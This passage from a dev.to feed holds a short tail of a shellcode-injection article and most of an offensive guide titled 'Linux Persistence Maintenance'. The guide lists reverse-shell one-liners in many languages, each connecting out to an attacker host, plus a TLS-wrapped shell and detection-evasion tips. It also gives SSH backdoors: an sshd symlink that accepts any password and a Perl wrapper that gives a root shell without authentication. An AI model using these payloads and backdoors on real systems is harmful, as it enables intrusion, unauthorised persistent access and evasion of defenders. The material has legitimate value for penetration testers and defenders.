&lt;/span&gt;&lt;span class="n"&gt;VERBOSE:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Injecting&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;shellcode&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;into&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;PID:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;4004&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="n"&gt;VERBOSE:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Injecting&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;into&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;a&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Wow64&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;process.&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="n"&gt;VERBOSE:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Using&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;32-bit&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;shellcode.&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="n"&gt;VERBOSE:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Shellcode&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;memory&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;reserved&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;at&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;0x03BE0000&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="n"&gt;VERBOSE:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Emitting&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;32-bit&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;assembly&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;call&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;stub.&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="n"&gt;VERBOSE:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Thread&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;call&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;stub&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;memory&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;reserved&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;at&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;0x001B0000&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="n"&gt;VERBOSE:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Shellcode&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;injection&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;complete&lt;/span&gt;&lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;






&lt;p&gt;The techniques themselves are static; creativity in their application is paramount. I trust that this article serves as a catalyst for further exploration, encouraging practitioners to combine multiple techniques with ingenuity to achieve their desired outcomes in real-world environments.&lt;/p&gt;

</description>
      <category>shellcode</category>
      <category>cybersecurity</category>
      <category>evasion</category>
      <category>techniques</category>
    </item>
    <item>
      <title>Linux Persistence Maintenance</title>
      <dc:creator>Excalibra</dc:creator>
      <pubDate>Mon, 22 Jun 2026 08:36:46 +0000</pubDate>
      <link>https://dev.to/excalibra/linux-persistence-maintenance-54hj</link>
      <guid>https://dev.to/excalibra/linux-persistence-maintenance-54hj</guid>
      <description>&lt;h2&gt;
  
  
  0X00 On Persistence Maintenance
&lt;/h2&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F73vrbkgatd4492ruz2m2.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F73vrbkgatd4492ruz2m2.png" alt=" " width="800" height="1465"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  What is Persistence Maintenance?
&lt;/h3&gt;

&lt;p&gt;We can straightforwardly understand persistence maintenance as the installation of a backdoor on the target. The purpose of persistence maintenance is to ensure that one's privileges are not lost and to maintain continuous control over the target.&lt;/p&gt;

&lt;h2&gt;
  
  
  0X01 Obtaining Initial Access
&lt;/h2&gt;

&lt;p&gt;Linux offers numerous methods for establishing a reverse shell. The defining advantage of a reverse shell is that the &lt;em&gt;target&lt;/em&gt; initiates the outbound connection, so it works through NAT and inbound firewall filtering where a bind shell would not. Note that a raw reverse shell is not a full TTY: command completion, job control and signal handling only arrive once the shell is upgraded to a pseudo-terminal, as shown later in this section. In any case, from a persistence perspective, it facilitates the execution of subsequent actions.&lt;/p&gt;

&lt;p&gt;The ability to obtain a reverse shell depends on the target's environment. It is possible that Bash cannot directly establish a reverse shell, whereas Python might succeed. One must also remain mindful of application whitelisting.&lt;/p&gt;

&lt;p&gt;For the experimental environment, Kali Linux will be used; ensure that a snapshot is taken.&lt;/p&gt;

&lt;h3&gt;
  
  
  Bash
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;bash &lt;span class="nt"&gt;-i&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&lt;/span&gt;&amp;amp; /dev/tcp/10.0.0.1/8080 0&amp;gt;&amp;amp;1
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;





&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;bash &lt;span class="nt"&gt;-i&lt;/span&gt; 5&amp;lt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt;/dev/tcp/host/port 0&amp;gt;&amp;amp;5 1&amp;gt;&amp;amp;5
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Perl
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight perl"&gt;&lt;code&gt;&lt;span class="nv"&gt;perl&lt;/span&gt; &lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="nv"&gt;e&lt;/span&gt; &lt;span class="p"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,"&amp;gt;&amp;amp;S");open(STDOUT,"&amp;gt;&amp;amp;S");open(STDERR,"&amp;gt;&amp;amp;S");exec("/bin/sh -i");};&lt;/span&gt;&lt;span class="p"&gt;'&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  URL-Encoded Perl: Linux
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;echo%20%27use%20Socket%3B%24i%3D%2210.11.0.245%22%3B%24p%3D443%3Bsocket%28S%2CPF_INET%2CSOCK_STREAM%2Cgetprotobyname%28%22tcp%22%29%29%3Bif%28connect%28S%2Csockaddr_in%28%24p%2Cinet_aton%28%24i%29%29%29%29%7Bopen%28STDIN%2C%22%3E%26S%22%29%3Bopen%28STDOUT%2C%22%3E%26S%22%29%3Bopen%28STDERR%2C%22%3E%26S%22%29%3Bexec%28%22%2fbin%2fsh%20-i%22%29%3B%7D%3B%27%20%3E%20%2ftmp%2fpew%20%26%26%20%2fusr%2fbin%2fperl%20%2ftmp%2fpew
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Python
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="n"&gt;python&lt;/span&gt; &lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="n"&gt;c&lt;/span&gt; &lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;10.0.0.1&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;,1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;/bin/sh&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;,&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;-i&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;]);&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  PHP
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight php"&gt;&lt;code&gt;&lt;span class="n"&gt;php&lt;/span&gt; &lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="n"&gt;r&lt;/span&gt; &lt;span class="s1"&gt;'$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i &amp;lt;&amp;amp;3 &amp;gt;&amp;amp;3 2&amp;gt;&amp;amp;3");'&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Ruby
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight ruby"&gt;&lt;code&gt;&lt;span class="n"&gt;ruby&lt;/span&gt; &lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="n"&gt;rsocket&lt;/span&gt; &lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="s1"&gt;'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i &amp;lt;&amp;amp;%d &amp;gt;&amp;amp;%d 2&amp;gt;&amp;amp;%d",f,f,f)'&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Netcat without -e #1
&lt;/h3&gt;

&lt;p&gt;&lt;code&gt;mkfifo&lt;/code&gt; creates a named pipe (a FIFO special file) on the filesystem; it carries no data until one process opens it for reading and another for writing. In the one-liner below, &lt;code&gt;cat /tmp/f&lt;/code&gt; is the reader that feeds the shell's stdin, and the trailing &lt;code&gt;&amp;gt; /tmp/f&lt;/code&gt; makes netcat the writer, so the FIFO carries the attacker's input back around the pipeline. Pick a less conspicuous path than &lt;code&gt;/tmp/f&lt;/code&gt; and remove the FIFO afterwards.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;rm&lt;/span&gt; /tmp/f&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="nb"&gt;mkfifo&lt;/span&gt; /tmp/f&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="nb"&gt;cat&lt;/span&gt; /tmp/f | /bin/sh &lt;span class="nt"&gt;-i&lt;/span&gt; 2&amp;gt;&amp;amp;1 | nc 10.0.0.1 1234 &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; /tmp/f
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Netcat without -e #2
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;nc localhost 443 | /bin/sh | nc localhost 444
telnet localhost 443 | /bin/sh | telnet localhost 444
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Java
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight java"&gt;&lt;code&gt;&lt;span class="n"&gt;r&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nc"&gt;Runtime&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="na"&gt;getRuntime&lt;/span&gt;&lt;span class="o"&gt;();&lt;/span&gt; &lt;span class="n"&gt;p&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;r&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="na"&gt;exec&lt;/span&gt;&lt;span class="o"&gt;([&lt;/span&gt;&lt;span class="s"&gt;"/bin/bash"&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt;&lt;span class="s"&gt;"-c"&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt;&lt;span class="s"&gt;"exec 5&amp;lt;&amp;gt;/dev/tcp/10.0.0.1/2002;cat &amp;lt;&amp;amp;5 | while read line; do \$line 2&amp;gt;&amp;amp;5 &amp;gt;&amp;amp;5; done"&lt;/span&gt;&lt;span class="o"&gt;]&lt;/span&gt; &lt;span class="n"&gt;as&lt;/span&gt; &lt;span class="nc"&gt;String&lt;/span&gt;&lt;span class="o"&gt;[]);&lt;/span&gt; &lt;span class="n"&gt;p&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="na"&gt;waitFor&lt;/span&gt;&lt;span class="o"&gt;();&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Xterm
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;xterm &lt;span class="nt"&gt;-display&lt;/span&gt; 10.0.0.1:1
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Exec
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;0&amp;lt;&amp;amp;196&lt;span class="p"&gt;;&lt;/span&gt;&lt;span class="nb"&gt;exec &lt;/span&gt;196&amp;lt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt;/dev/tcp/&amp;lt;your_vps&amp;gt;/1024&lt;span class="p"&gt;;&lt;/span&gt; sh &amp;lt;&amp;amp;196 &lt;span class="o"&gt;&amp;gt;&lt;/span&gt;&amp;amp;196 2&amp;gt;&amp;amp;196
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Consider:&lt;/strong&gt; If during penetration testing one discovers that the target environment cannot establish a reverse shell, and only ports 80 and 443 are open, while traffic is intercepted when attempting a reverse shell via whitelisted ports, how should one respond?&lt;/p&gt;

&lt;p&gt;One may attempt to wrap the channel in TLS so that a monitoring device cannot read the shell traffic. Be aware that this only hides the content: a self-signed certificate on port 443, an unusual client fingerprint, or a device that performs TLS interception can still expose the session.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 1:&lt;/strong&gt;&lt;br&gt;&lt;br&gt;
Generate an SSL certificate public/private key pair on the VPS:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;openssl req &lt;span class="nt"&gt;-x509&lt;/span&gt; &lt;span class="nt"&gt;-newkey&lt;/span&gt; rsa:4096 &lt;span class="nt"&gt;-keyout&lt;/span&gt; key.pem &lt;span class="nt"&gt;-out&lt;/span&gt; cert.pem &lt;span class="nt"&gt;-days&lt;/span&gt; 365 &lt;span class="nt"&gt;-nodes&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Step 2:&lt;/strong&gt;&lt;br&gt;&lt;br&gt;
Listen for the reverse shell on the VPS:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;openssl s_server &lt;span class="nt"&gt;-quiet&lt;/span&gt; &lt;span class="nt"&gt;-key&lt;/span&gt; key.pem &lt;span class="nt"&gt;-cert&lt;/span&gt; cert.pem &lt;span class="nt"&gt;-port&lt;/span&gt; 443
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Step 3:&lt;/strong&gt;&lt;br&gt;&lt;br&gt;
Connect:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;mkfifo&lt;/span&gt; /tmp/excalibra&lt;span class="p"&gt;;&lt;/span&gt;/bin/bash &lt;span class="nt"&gt;-i&lt;/span&gt; &amp;lt; /tmp/excalibra 2&amp;gt;&amp;amp;1 | openssl s_client &lt;span class="nt"&gt;-quiet&lt;/span&gt; &lt;span class="nt"&gt;-connect&lt;/span&gt; 1.1.1.1:443 &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; /tmp/excalibra
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Obtain shell. Note that &lt;code&gt;s_client -quiet&lt;/code&gt; proceeds even though the certificate is self-signed and unverified, so the channel is encrypted but not authenticated: anyone able to intercept the connection can terminate the TLS session and take over the shell. If that matters, pin the listener's certificate on the client side with &lt;code&gt;-CAfile cert.pem -verify_return_error&lt;/code&gt;, and replace the placeholder &lt;code&gt;1.1.1.1&lt;/code&gt; with your own listener address.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fbp3f2epk7myta5d485p0.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fbp3f2epk7myta5d485p0.png" alt=" " width="798" height="176"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;However, one will notice that this shell is not particularly usable, lacking basic command completion.&lt;/p&gt;

&lt;p&gt;Solution:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;python &lt;span class="nt"&gt;-c&lt;/span&gt; &lt;span class="s1"&gt;'import pty; pty.spawn("/bin/bash")'&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;code&gt;pty&lt;/code&gt; is a pseudo-terminal module.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="n"&gt;pty&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;spawn&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;argv&lt;/span&gt;&lt;span class="p"&gt;[,&lt;/span&gt; &lt;span class="n"&gt;master_read&lt;/span&gt;&lt;span class="p"&gt;[,&lt;/span&gt; &lt;span class="n"&gt;stdin_read&lt;/span&gt;&lt;span class="p"&gt;]])&lt;/span&gt;
&lt;span class="n"&gt;Spawn&lt;/span&gt; &lt;span class="n"&gt;a&lt;/span&gt; &lt;span class="n"&gt;process&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="ow"&gt;and&lt;/span&gt; &lt;span class="n"&gt;connect&lt;/span&gt; &lt;span class="n"&gt;its&lt;/span&gt; &lt;span class="n"&gt;controlling&lt;/span&gt; &lt;span class="n"&gt;terminal&lt;/span&gt; &lt;span class="k"&gt;with&lt;/span&gt; &lt;span class="n"&gt;the&lt;/span&gt; &lt;span class="n"&gt;current&lt;/span&gt; &lt;span class="n"&gt;process&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;s standard I/O. This is often used to baffle programs which insist on reading from the controlling terminal.

The functions master_read and stdin_read should be functions which read from a file descriptor. The defaults try to read 1024 bytes each time they are called.

Changed in version 3.4: spawn() now returns the status value from os.waitpid() on the child process.
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Sometimes after privilege escalation, the terminal may exhibit similar issues; this method generally resolves them. Alternatively, the socat approach in the next section requests a pty directly on the target side.&lt;/p&gt;

&lt;h3&gt;
  
  
  Socat
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;socat file:&lt;span class="sb"&gt;`&lt;/span&gt;&lt;span class="nb"&gt;tty&lt;/span&gt;&lt;span class="sb"&gt;`&lt;/span&gt;,raw,echo&lt;span class="o"&gt;=&lt;/span&gt;0 tcp-listen:9999

Upload socat to the target machine, &lt;span class="k"&gt;then &lt;/span&gt;execute:
socat &lt;span class="nb"&gt;exec&lt;/span&gt;:&lt;span class="s1"&gt;'bash -li'&lt;/span&gt;,pty,stderr,setsid,sigint,sane tcp:111.111.111.111:9999
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This also yields an interactive shell.&lt;/p&gt;

&lt;h2&gt;
  
  
  0X02 Persistence Techniques
&lt;/h2&gt;

&lt;h3&gt;
  
  
  SSH Backdoor
&lt;/h3&gt;

&lt;h4&gt;
  
  
  SSH Soft Link
&lt;/h4&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;ln&lt;/span&gt; &lt;span class="nt"&gt;-sf&lt;/span&gt; /usr/sbin/sshd /tmp/su&lt;span class="p"&gt;;&lt;/span&gt; /tmp/su &lt;span class="nt"&gt;-oPort&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;5555&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Create a soft link and then access the SSH service via port 5555.&lt;/p&gt;

&lt;p&gt;Add a user (note that &lt;code&gt;useradd -p&lt;/code&gt; expects an already-hashed password, not a plaintext one; a plaintext value leaves the account unable to log in normally, which is irrelevant here because the PAM bypass described below never examines the password):&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;useradd excalibra &lt;span class="nt"&gt;-p&lt;/span&gt; excalibra
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;When connecting via SSH on port 5555, any password is accepted for any existing account (during Kali testing even root worked, which additionally requires &lt;code&gt;PermitRootLogin&lt;/code&gt; to allow password authentication). The mechanism is PAM: sshd selects its PAM service name from its own process name, so an sshd started through a symlink called &lt;code&gt;su&lt;/code&gt; authenticates against &lt;code&gt;/etc/pam.d/su&lt;/code&gt;, which on most distributions contains &lt;code&gt;auth sufficient pam_rootok.so&lt;/code&gt;; because sshd runs as root, that check succeeds and the password is never checked. Prerequisites are root on the target and &lt;code&gt;UsePAM yes&lt;/code&gt; in &lt;code&gt;sshd_config&lt;/code&gt;; the extra listener on 5555 and the odd &lt;code&gt;/tmp/su&lt;/code&gt; process are easy to spot with &lt;code&gt;ss -ltnp&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;For the specific principle, see &lt;a href="http://www.91ri.org/16803.html" rel="noopener noreferrer"&gt;An Investigation of PAM Triggered by a Linux Backdoor&lt;/a&gt;.&lt;/p&gt;

&lt;h4&gt;
  
  
  SSH Wrapper
&lt;/h4&gt;

&lt;p&gt;Exploit (this moves the real sshd binary to &lt;code&gt;/usr/bin/sshd&lt;/code&gt; and replaces &lt;code&gt;/usr/sbin/sshd&lt;/code&gt; with a Perl wrapper, so package verification such as &lt;code&gt;debsums&lt;/code&gt; or &lt;code&gt;rpm -V&lt;/code&gt; and any file-integrity monitoring will flag it; note also that on Debian-based systems, including Kali, the service is named &lt;code&gt;ssh&lt;/code&gt;, so the last line becomes &lt;code&gt;systemctl restart ssh&lt;/code&gt;):&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;cd&lt;/span&gt; /usr/sbin/
&lt;span class="nb"&gt;mv &lt;/span&gt;sshd ../bin/
&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s1"&gt;'#!/usr/bin/perl'&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&lt;/span&gt;sshd
&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s1"&gt;'exec "/bin/sh" if(getpeername(STDIN) =~ /^..4A/);'&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&amp;gt;&lt;/span&gt;sshd
&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s1"&gt;'exec{"/usr/bin/sshd"} "/usr/sbin/sshd",@ARGV,'&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&amp;gt;&lt;/span&gt;sshd
&lt;span class="nb"&gt;chmod &lt;/span&gt;u+x sshd
/etc/init.d/sshd restart
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Then connect:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;socat STDIO TCP4:target_ip:22,sourceport&lt;span class="o"&gt;=&lt;/span&gt;13377
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Principle:  &lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;init first starts /usr/sbin/sshd (now the Perl wrapper); when the script reaches &lt;code&gt;getpeername&lt;/code&gt;, stdin is not a socket yet, the regular expression fails to match, and execution proceeds to the next line, which launches /usr/bin/sshd — the original sshd — while passing &lt;code&gt;/usr/sbin/sshd&lt;/code&gt; as its argv[0]. The original sshd listens on the port and, after establishing a TCP connection, forks a child process to handle it. That child re-executes itself using argv[0], i.e. the wrapper script again, this time with standard input and output already redirected to the socket, so &lt;code&gt;getpeername&lt;/code&gt; returns the client's real address and the regex is tested against the port bytes of the sockaddr. The quoted article used &lt;code&gt;/^..LF/&lt;/code&gt;, which is port 19526 (0x4C46); the wrapper shown above uses &lt;code&gt;/^..4A/&lt;/code&gt;, i.e. port 13377 (0x3441), which is why the socat command sets &lt;code&gt;sourceport=13377&lt;/code&gt;. On a match it executes &lt;code&gt;sh&lt;/code&gt; to provide a root shell, with no authentication at all, to anyone who connects from that source port.&lt;br&gt;&lt;br&gt;
From &lt;a href="https://www.anquanke.com/post/id/155943#h2-9" rel="noopener noreferrer"&gt;https://www.anquanke.com/post/id/155943#h2-9&lt;/a&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h4&gt;
  
  
  SSH Key Injection
&lt;/h4&gt;

&lt;p&gt;First, generate an SSH key locally:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;ssh-keygen &lt;span class="nt"&gt;-t&lt;/span&gt; rsa
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Then transmit the public key &lt;code&gt;id_rsa.pub&lt;/code&gt; to the target and append its contents to &lt;code&gt;~/.ssh/authorized_keys&lt;/code&gt; of the account you want to keep (creating the directory and file if they do not exist). From the defender's side, an unexpected entry in &lt;code&gt;authorized_keys&lt;/code&gt; is one of the most common persistence indicators, so these files are worth auditing regularly.&lt;/p&gt;

&lt;p&gt;At the same time, assign appropriate permissions, but they must not be overly permissive:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;chmod &lt;/span&gt;600 ~/.ssh/authorized_keys
&lt;span class="nb"&gt;chmod &lt;/span&gt;700 ~/.ssh
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  SSH Keylogger
&lt;/h4&gt;

